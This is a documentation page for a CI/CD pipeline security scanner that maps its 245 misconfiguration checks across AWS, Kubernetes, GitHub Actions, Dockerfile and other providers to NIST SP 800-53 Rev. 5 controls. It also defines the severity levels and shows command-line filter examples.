NIST SP 800-53 Rev. 5
- Version: Rev. 5
- URL: https://csrc.nist.gov/pubs/sp/800/53/r5/upd1/final
- Source of truth:
pipeline_check/core/standards/data/nist_800_53.py
The federal control catalog. The scanner evidences the AC, AU, CM, IA, SI, and SR family controls whose CI/CD-side state is visible in pipeline configuration. Use this page when an authorisation package asks for 800-53 control evidence; pair with NIST SSDF for SSDLC vocabulary.
At a glance
- Controls in this standard: 26
- Controls evidenced by at least one check: 26 / 26
- Distinct checks evidencing this standard: 245
- Of those, autofixable with
--fix: 63
How to read severity
Every check below ships at a fixed severity level. The scale is the same across providers and standards so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.
| Level | What it means | Examples |
|---|---|---|
| CRITICAL | Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. | Hardcoded credential literal, branch ref pointing at a known-compromised action, signed-into-an-unverified registry. |
| HIGH | Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. | Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod. |
| MEDIUM | Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. | Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window. |
| LOW | Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. | Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push. |
| INFO | Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. | CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed. |
Coverage by control
Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info).
| Control | Title | Checks | Severity mix |
|---|---|---|---|
AC-2 |
Account Management | 7 | 1H · 6M |
AC-3 |
Access Enforcement | 27 | 7C · 11H · 9M |
AC-6 |
Least Privilege | 50 | 7C · 25H · 17M · 1L |
AU-2 |
Event Logging | 18 | 3H · 5M · 10L |
AU-9 |
Protection of Audit Information | 8 | 1C · 3H · 4M |
AU-11 |
Audit Record Retention | 1 | 1L |
AU-12 |
Audit Record Generation | 8 | 2H · 3M · 3L |
CM-2 |
Baseline Configuration | 13 | 1H · 8M · 4L |
CM-6 |
Configuration Settings | 54 | 6C · 19H · 19M · 10L |
CM-7 |
Least Functionality | 22 | 3C · 13H · 6M |
CM-8 |
System Component Inventory | 9 | 1H · 5M · 3L |
IA-5 |
Authenticator Management | 31 | 13C · 11H · 7M |
RA-5 |
Vulnerability Monitoring and Scanning | 11 | 5H · 6M |
SA-10 |
Developer Configuration Management | 10 | 3H · 7M |
SA-11 |
Developer Testing and Evaluation | 18 | 3C · 11H · 3M · 1L |
SA-15 |
Development Process, Standards, and Tools | 5 | 3H · 2M |
SC-7 |
Boundary Protection | 22 | 9C · 7H · 6M |
SC-8 |
Transmission Confidentiality and Integrity | 9 | 5H · 3M · 1L |
SC-12 |
Cryptographic Key Establishment and Management | 9 | 2H · 7M |
SC-13 |
Cryptographic Protection | 9 | 2H · 7M |
SC-28 |
Protection of Information at Rest | 12 | 4C · 3H · 5M |
SI-2 |
Flaw Remediation | 33 | 14H · 12M · 7L |
SI-7 |
Software, Firmware, and Information Integrity | 33 | 4C · 14H · 15M |
SR-3 |
Supply Chain Controls and Processes | 39 | 1C · 27H · 7M · 4L |
SR-4 |
Provenance | 24 | 3H · 18M · 3L |
SR-11 |
Component Authenticity | 31 | 27H · 4M |
Filter at runtime
Restrict a scan to checks that evidence this standard with --standard nist_800_53:
# All providers, only checks tied to this standard
pipeline_check --standard nist_800_53
# Compose with --pipeline to scope by provider
pipeline_check --pipeline github --standard nist_800_53
# Compose with another standard to widen the lens
pipeline_check --pipeline aws --standard nist_800_53 --standard owasp_cicd_top_10
Controls in scope
AC-2: Account Management
Evidenced by 7 checks across 4 providers (AWS, Argo Workflows, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-003 |
Argo workflow uses the default ServiceAccount | MEDIUM | Argo Workflows | |
IAM-003 |
CI/CD role has no permission boundary | MEDIUM | AWS | |
IAM-005 |
CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
K8S-011 |
Pod serviceAccountName unset or 'default' | MEDIUM | Kubernetes | |
K8S-034 |
ServiceAccount automountServiceAccountToken not explicitly false | MEDIUM | Kubernetes | |
PBAC-002 |
CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
TKN-007 |
Tekton run uses the default ServiceAccount | MEDIUM | Tekton |
AC-3: Access Enforcement
Evidenced by 27 checks across 7 providers (AWS, Azure DevOps, Bitbucket, Buildkite, Cloud Build, GitLab CI, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-004 |
Deployment job missing environment binding | MEDIUM | Azure DevOps | |
BB-004 |
Deploy step missing deployment: environment gate |
MEDIUM | Bitbucket | |
BK-007 |
Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
BK-013 |
Deploy step has no branches: filter | MEDIUM | Buildkite | |
CA-003 |
CodeArtifact domain policy allows cross-account wildcard | CRITICAL | AWS | |
CCM-001 |
CodeCommit repository has no approval rule template attached | HIGH | AWS | |
CCM-003 |
CodeCommit trigger targets SNS/Lambda in a different account | MEDIUM | AWS | |
ECR-003 |
Repository policy allows public access | CRITICAL | AWS | |
GCB-002 |
Cloud Build uses the default service account | HIGH | Cloud Build | |
GCB-020 |
serviceAccount points at the default Cloud Build service account | HIGH | Cloud Build | |
GL-004 |
Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI | |
IAM-001 |
CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
IAM-002 |
CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
IAM-004 |
CI/CD role can PassRole to any role | HIGH | AWS | |
IAM-005 |
CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
IAM-006 |
Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
K8S-020 |
ClusterRoleBinding grants cluster-admin or system:masters | CRITICAL | Kubernetes | 🔧 fix |
K8S-021 |
Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
K8S-026 |
LoadBalancer Service has no loadBalancerSourceRanges | HIGH | Kubernetes | |
K8S-029 |
RoleBinding grants permissions to the default ServiceAccount | HIGH | Kubernetes | 🔧 fix |
K8S-032 |
Namespace lacks default-deny NetworkPolicy | MEDIUM | Kubernetes | |
K8S-038 |
NetworkPolicy ingress / egress allows all sources or destinations | MEDIUM | Kubernetes | |
KMS-002 |
KMS key policy grants wildcard KMS actions | HIGH | AWS | |
LMB-002 |
Lambda function URL has AuthType=NONE | HIGH | AWS | |
LMB-004 |
Lambda resource policy allows wildcard principal | CRITICAL | AWS | |
S3-001 |
Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
SM-002 |
Secrets Manager resource policy allows wildcard principal | CRITICAL | AWS |
AC-6: Least Privilege
Evidenced by 50 checks across 9 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-002 |
Argo template container runs privileged or as root | HIGH | Argo Workflows | |
ARGO-003 |
Argo workflow uses the default ServiceAccount | MEDIUM | Argo Workflows | |
ARGO-004 |
Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
ARGO-013 |
Argo workflow does not opt out of SA token automount | MEDIUM | Argo Workflows | |
BK-005 |
Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
CA-004 |
CodeArtifact repo policy grants codeartifact: with Resource '' | HIGH | AWS | |
CC-014 |
Job missing resource_class declaration |
MEDIUM | CircleCI | |
DF-002 |
Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
DF-008 |
RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
DF-012 |
RUN invokes sudo | HIGH | Dockerfile | |
DF-014 |
WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
DF-015 |
RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
DF-017 |
ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
DF-018 |
RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
EB-002 |
EventBridge rule has a wildcard target ARN | HIGH | AWS | |
GCB-002 |
Cloud Build uses the default service account | HIGH | Cloud Build | |
GCB-016 |
Step dir field contains parent-directory escape (..) | MEDIUM | Cloud Build | |
GCB-020 |
serviceAccount points at the default Cloud Build service account | HIGH | Cloud Build | |
GHA-004 |
Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
GHA-034 |
Reusable workflow called with secrets: inherit | MEDIUM | GitHub Actions | 🔧 fix |
IAM-001 |
CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
IAM-002 |
CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
IAM-003 |
CI/CD role has no permission boundary | MEDIUM | AWS | |
IAM-004 |
CI/CD role can PassRole to any role | HIGH | AWS | |
IAM-006 |
Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
K8S-005 |
Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
K8S-006 |
Container allowPrivilegeEscalation not explicitly false | HIGH | Kubernetes | 🔧 fix |
K8S-007 |
Container runAsNonRoot not true / runAsUser is 0 | HIGH | Kubernetes | 🔧 fix |
K8S-009 |
Container capabilities not dropping ALL / adding dangerous caps | HIGH | Kubernetes | |
K8S-011 |
Pod serviceAccountName unset or 'default' | MEDIUM | Kubernetes | |
K8S-012 |
Pod automountServiceAccountToken not false | MEDIUM | Kubernetes | |
K8S-013 |
Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
K8S-014 |
Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
K8S-020 |
ClusterRoleBinding grants cluster-admin or system:masters | CRITICAL | Kubernetes | 🔧 fix |
K8S-021 |
Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
K8S-023 |
Namespace missing Pod Security Admission enforcement label | HIGH | Kubernetes | |
K8S-025 |
System priority class used outside kube-system | HIGH | Kubernetes | |
K8S-029 |
RoleBinding grants permissions to the default ServiceAccount | HIGH | Kubernetes | 🔧 fix |
K8S-030 |
Workload schedules onto a control-plane node | HIGH | Kubernetes | 🔧 fix |
K8S-031 |
Namespace missing PSA warn label | LOW | Kubernetes | |
K8S-034 |
ServiceAccount automountServiceAccountToken not explicitly false | MEDIUM | Kubernetes | |
K8S-035 |
Container securityContext.runAsUser is 0 | HIGH | Kubernetes | |
K8S-039 |
Pod uses shareProcessNamespace: true | MEDIUM | Kubernetes | |
K8S-040 |
Container securityContext.procMount: Unmasked | HIGH | Kubernetes | |
KMS-002 |
KMS key policy grants wildcard KMS actions | HIGH | AWS | |
PBAC-002 |
CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
TKN-002 |
Tekton step runs privileged or as root | HIGH | Tekton | |
TKN-004 |
Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton | |
TKN-007 |
Tekton run uses the default ServiceAccount | MEDIUM | Tekton | |
TKN-013 |
Tekton sidecar runs privileged or as root | HIGH | Tekton |
AU-2: Event Logging
Evidenced by 18 checks across 9 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-007 |
Argo workflow has no activeDeadlineSeconds | LOW | Argo Workflows | |
BK-006 |
Step has no timeout_in_minutes | LOW | Buildkite | |
CB-003 |
Build logging not enabled | MEDIUM | AWS | |
CC-011 |
No store_test_results step (test results not archived) | LOW | CircleCI | |
CD-003 |
No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
CT-001 |
No active CloudTrail trail in region | HIGH | AWS | |
CT-003 |
CloudTrail trail is not multi-region | MEDIUM | AWS | |
CW-001 |
No CloudWatch alarm on CodeBuild FailedBuilds metric | LOW | AWS | |
CWL-001 |
CodeBuild log group has no retention policy | LOW | AWS | |
DF-007 |
No HEALTHCHECK directive declared | LOW | Dockerfile | 🔧 fix |
DF-020 |
ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
EB-001 |
No EventBridge rule for CodePipeline failure notifications | MEDIUM | AWS | |
GCB-014 |
Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
GCB-025 |
Build has no tags for audit / discoverability | LOW | Cloud Build | |
JF-011 |
Pipeline has no buildDiscarder retention policy |
LOW | Jenkins | 🔧 fix |
K8S-024 |
Container missing both livenessProbe and readinessProbe | MEDIUM | Kubernetes | |
S3-004 |
Artifact bucket access logging not enabled | LOW | AWS | |
TKN-006 |
Tekton run lacks an explicit timeout | LOW | Tekton |
AU-9: Protection of Audit Information
Evidenced by 8 checks across 2 providers (AWS, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CT-001 |
No active CloudTrail trail in region | HIGH | AWS | |
CT-002 |
CloudTrail log-file validation disabled | MEDIUM | AWS | |
CWL-002 |
CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
GCB-014 |
Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
S3-001 |
Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
S3-002 |
Artifact bucket server-side encryption not configured | HIGH | AWS | |
S3-003 |
Artifact bucket versioning not enabled | MEDIUM | AWS | |
S3-005 |
Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS |
AU-11: Audit Record Retention
Evidenced by 1 check across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CWL-001 |
CodeBuild log group has no retention policy | LOW | AWS |
AU-12: Audit Record Generation
Evidenced by 8 checks across 4 providers (AWS, CircleCI, Cloud Build, Jenkins).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CB-003 |
Build logging not enabled | MEDIUM | AWS | |
CC-011 |
No store_test_results step (test results not archived) | LOW | CircleCI | |
CD-003 |
No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
CT-001 |
No active CloudTrail trail in region | HIGH | AWS | |
CT-003 |
CloudTrail trail is not multi-region | MEDIUM | AWS | |
GCB-014 |
Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
JF-011 |
Pipeline has no buildDiscarder retention policy |
LOW | Jenkins | 🔧 fix |
S3-004 |
Artifact bucket access logging not enabled | LOW | AWS |
CM-2: Baseline Configuration
Evidenced by 13 checks across 8 providers (AWS, Argo Workflows, Azure DevOps, Buildkite, Cloud Build, Dockerfile, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-005 |
Container image not pinned to specific version | HIGH | Azure DevOps | |
ARGO-011 |
No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
BK-011 |
No SLSA provenance attestation produced | MEDIUM | Buildkite | |
CB-005 |
Outdated managed build image | MEDIUM | AWS | |
DF-010 |
apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
ECR-004 |
No lifecycle policy configured | LOW | AWS | |
GCB-007 |
availableSecrets references versions/latest |
MEDIUM | Cloud Build | 🔧 fix |
GCB-017 |
Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
GCB-018 |
Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) | MEDIUM | Cloud Build | |
HELM-001 |
Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
HELM-006 |
Chart.yaml does not declare a kubeVersion compatibility range | LOW | Helm | |
HELM-010 |
Chart.yaml appVersion field is empty or missing | LOW | Helm | |
TKN-011 |
No SLSA provenance attestation produced | MEDIUM | Tekton |
CM-6: Configuration Settings
Evidenced by 54 checks across 14 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-002 |
Script injection via attacker-controllable context | HIGH | Azure DevOps | |
ARGO-005 |
Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
BB-002 |
Script injection via attacker-controllable context | HIGH | Bitbucket | |
BB-005 |
Step has no max-time, unbounded build |
MEDIUM | Bitbucket | 🔧 fix |
BK-003 |
Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
CB-002 |
Privileged mode enabled | HIGH | AWS | |
CB-004 |
No build timeout configured | LOW | AWS | |
CB-007 |
CodeBuild webhook has no filter group | MEDIUM | AWS | |
CC-002 |
Script injection via untrusted environment variable | HIGH | CircleCI | |
CC-010 |
Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
CC-012 |
Dynamic config via setup: true enables code injection |
MEDIUM | CircleCI | |
CC-014 |
Job missing resource_class declaration |
MEDIUM | CircleCI | |
CC-015 |
No no_output_timeout configured |
MEDIUM | CircleCI | 🔧 fix |
CC-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
CP-003 |
Source stage using polling instead of event-driven trigger | LOW | AWS | |
DF-002 |
Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
DF-005 |
RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
DF-009 |
ADD used where COPY would suffice | LOW | Dockerfile | |
DF-011 |
Package manager install without cache cleanup in same layer | LOW | Dockerfile | |
DF-012 |
RUN invokes sudo | HIGH | Dockerfile | |
DF-014 |
WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
DF-015 |
RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
DF-017 |
ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
DF-018 |
RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
GCB-005 |
Build timeout unset or excessive | LOW | Cloud Build | 🔧 fix |
GCB-006 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
GCB-016 |
Step dir field contains parent-directory escape (..) | MEDIUM | Cloud Build | |
GCB-019 |
Shell entrypoint inlines a user substitution into args | HIGH | Cloud Build | |
GCB-022 |
options.substitutionOption set to ALLOW_LOOSE | LOW | Cloud Build | 🔧 fix |
GCB-023 |
Step references a user substitution not declared in substitutions: | MEDIUM | Cloud Build | |
GCB-026 |
Step waitFor: references an unknown step id | MEDIUM | Cloud Build | |
GHA-002 |
pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
GHA-003 |
Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
GHA-004 |
Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
GHA-035 |
github-script step interpolates untrusted context | HIGH | GitHub Actions | |
GL-002 |
Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
GL-005 |
include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
HELM-006 |
Chart.yaml does not declare a kubeVersion compatibility range | LOW | Helm | |
JF-015 |
Pipeline has no timeout wrapper, unbounded build |
MEDIUM | Jenkins | 🔧 fix |
K8S-005 |
Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
K8S-006 |
Container allowPrivilegeEscalation not explicitly false | HIGH | Kubernetes | 🔧 fix |
K8S-007 |
Container runAsNonRoot not true / runAsUser is 0 | HIGH | Kubernetes | 🔧 fix |
K8S-008 |
Container readOnlyRootFilesystem not true | MEDIUM | Kubernetes | 🔧 fix |
K8S-010 |
Container seccompProfile not RuntimeDefault or Localhost | MEDIUM | Kubernetes | |
K8S-015 |
Container missing resources.limits.memory | MEDIUM | Kubernetes | |
K8S-016 |
Container missing resources.limits.cpu | LOW | Kubernetes | |
K8S-019 |
Workload deployed in the 'default' namespace | LOW | Kubernetes | |
K8S-023 |
Namespace missing Pod Security Admission enforcement label | HIGH | Kubernetes | |
K8S-031 |
Namespace missing PSA warn label | LOW | Kubernetes | |
K8S-033 |
Namespace lacks ResourceQuota or LimitRange | MEDIUM | Kubernetes | |
K8S-035 |
Container securityContext.runAsUser is 0 | HIGH | Kubernetes | |
K8S-039 |
Pod uses shareProcessNamespace: true | MEDIUM | Kubernetes | |
K8S-040 |
Container securityContext.procMount: Unmasked | HIGH | Kubernetes | |
TKN-003 |
Tekton param interpolated unsafely in step script | CRITICAL | Tekton |
CM-7: Least Functionality
Evidenced by 22 checks across 8 providers (AWS, Argo Workflows, Buildkite, CircleCI, Dockerfile, GitHub Actions, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-002 |
Argo template container runs privileged or as root | HIGH | Argo Workflows | |
BK-005 |
Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
CB-002 |
Privileged mode enabled | HIGH | AWS | |
CB-007 |
CodeBuild webhook has no filter group | MEDIUM | AWS | |
CC-010 |
Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
CC-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
DF-008 |
RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
DF-013 |
EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
GHA-004 |
Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
K8S-002 |
Pod hostNetwork: true | HIGH | Kubernetes | 🔧 fix |
K8S-003 |
Pod hostPID: true | HIGH | Kubernetes | 🔧 fix |
K8S-004 |
Pod hostIPC: true | HIGH | Kubernetes | 🔧 fix |
K8S-005 |
Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
K8S-009 |
Container capabilities not dropping ALL / adding dangerous caps | HIGH | Kubernetes | |
K8S-012 |
Pod automountServiceAccountToken not false | MEDIUM | Kubernetes | |
K8S-021 |
Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
K8S-022 |
Service exposes SSH (port 22) | MEDIUM | Kubernetes | |
K8S-025 |
System priority class used outside kube-system | HIGH | Kubernetes | |
K8S-028 |
Container declares hostPort | MEDIUM | Kubernetes | 🔧 fix |
K8S-030 |
Workload schedules onto a control-plane node | HIGH | Kubernetes | 🔧 fix |
TKN-002 |
Tekton step runs privileged or as root | HIGH | Tekton | |
TKN-013 |
Tekton sidecar runs privileged or as root | HIGH | Tekton |
CM-8: System Component Inventory
Evidenced by 9 checks across 7 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-010 |
No SBOM generated for build artifacts | MEDIUM | Argo Workflows | |
BK-010 |
No SBOM generated for build artifacts | MEDIUM | Buildkite | |
CC-007 |
SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | CircleCI | |
DF-016 |
Image lacks OCI provenance labels | LOW | Dockerfile | |
ECR-002 |
Image tags are mutable | HIGH | AWS | |
ECR-004 |
No lifecycle policy configured | LOW | AWS | |
GCB-015 |
SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) | MEDIUM | Cloud Build | |
GCB-024 |
Build pushes Docker images but top-level images: is empty | LOW | Cloud Build | |
TKN-010 |
No SBOM generated for build artifacts | MEDIUM | Tekton |
IA-5: Authenticator Management
Evidenced by 31 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-003 |
Variables contain literal secret values | CRITICAL | Azure DevOps | |
ARGO-006 |
Literal secret value in Argo template env or parameter default | CRITICAL | Argo Workflows | 🔧 fix |
ARGO-013 |
Argo workflow does not opt out of SA token automount | MEDIUM | Argo Workflows | |
BB-003 |
Variables contain literal secret values | CRITICAL | Bitbucket | |
BK-002 |
Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
CB-001 |
Secrets in plaintext environment variables | CRITICAL | AWS | |
CB-006 |
CodeBuild source auth uses long-lived token | HIGH | AWS | |
CC-004 |
Secret-like environment variable not managed via context | MEDIUM | CircleCI | |
CC-005 |
AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
CC-008 |
Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
CC-019 |
add_ssh_keys without fingerprint restriction |
HIGH | CircleCI | |
CP-004 |
Legacy ThirdParty/GitHub source action (OAuth token) | HIGH | AWS | |
DF-006 |
ENV or ARG carries a credential-shaped literal value | CRITICAL | Dockerfile | |
DF-019 |
COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
DF-020 |
ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
GCB-003 |
Secret Manager value referenced in step args | HIGH | Cloud Build | |
GCB-012 |
Credential-shaped literal in pipeline body | CRITICAL | Cloud Build | |
GCB-018 |
Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) | MEDIUM | Cloud Build | |
GHA-005 |
AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
GHA-034 |
Reusable workflow called with secrets: inherit | MEDIUM | GitHub Actions | 🔧 fix |
GL-003 |
Variables contain literal secret values | CRITICAL | GitLab CI | |
JF-004 |
AWS auth uses long-lived access keys via withCredentials | MEDIUM | Jenkins | 🔧 fix |
JF-008 |
Credential-shaped literal in pipeline body | CRITICAL | Jenkins | 🔧 fix |
JF-010 |
Long-lived AWS keys exposed via environment {} block | HIGH | Jenkins | 🔧 fix |
K8S-017 |
Container env value carries a credential-shaped literal | CRITICAL | Kubernetes | |
K8S-018 |
Secret stringData/data carries a credential-shaped literal | CRITICAL | Kubernetes | |
K8S-037 |
ConfigMap data carries a credential-shaped literal | HIGH | Kubernetes | |
LMB-003 |
Lambda function env vars may contain plaintext secrets | HIGH | AWS | |
SM-001 |
Secrets Manager secret has no rotation configured | HIGH | AWS | |
SSM-001 |
SSM Parameter with secret-like name is not a SecureString | HIGH | AWS | |
TKN-005 |
Literal secret value in Tekton step env or param default | CRITICAL | Tekton | 🔧 fix |
RA-5: Vulnerability Monitoring and Scanning
Evidenced by 11 checks across 7 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, GitHub Actions, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-012 |
No vulnerability scanning step | MEDIUM | Argo Workflows | |
BK-012 |
No vulnerability scanning step | MEDIUM | Buildkite | |
CB-005 |
Outdated managed build image | MEDIUM | AWS | |
CC-001 |
Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
CC-003 |
Docker image not pinned by digest | HIGH | CircleCI | |
CC-020 |
No vulnerability scanning step | MEDIUM | CircleCI | |
ECR-001 |
Image scanning on push not enabled | HIGH | AWS | |
GCB-001 |
Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
GCB-008 |
No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
GHA-001 |
Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
TKN-012 |
No vulnerability scanning step | MEDIUM | Tekton |
SA-10: Developer Configuration Management
Evidenced by 10 checks across 6 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, GitLab CI).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-004 |
Deployment job missing environment binding | MEDIUM | Azure DevOps | |
BB-004 |
Deploy step missing deployment: environment gate |
MEDIUM | Bitbucket | |
BK-007 |
Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
CC-009 |
Deploy job missing manual approval gate | MEDIUM | CircleCI | |
CC-013 |
Deploy job in workflow has no branch filter | MEDIUM | CircleCI | |
CCM-001 |
CodeCommit repository has no approval rule template attached | HIGH | AWS | |
CD-001 |
Automatic rollback on failure not enabled | MEDIUM | AWS | |
CD-002 |
AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
CP-001 |
No approval action before deploy stages | HIGH | AWS | |
GL-004 |
Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI |
SA-11: Developer Testing and Evaluation
Evidenced by 18 checks across 11 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-002 |
Script injection via attacker-controllable context | HIGH | Azure DevOps | |
ARGO-005 |
Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
BB-002 |
Script injection via attacker-controllable context | HIGH | Bitbucket | |
BK-003 |
Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
CC-002 |
Script injection via untrusted environment variable | HIGH | CircleCI | |
CC-012 |
Dynamic config via setup: true enables code injection |
MEDIUM | CircleCI | |
DF-005 |
RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
ECR-001 |
Image scanning on push not enabled | HIGH | AWS | |
GCB-006 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
GCB-008 |
No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
GCB-019 |
Shell entrypoint inlines a user substitution into args | HIGH | Cloud Build | |
GCB-022 |
options.substitutionOption set to ALLOW_LOOSE | LOW | Cloud Build | 🔧 fix |
GCB-023 |
Step references a user substitution not declared in substitutions: | MEDIUM | Cloud Build | |
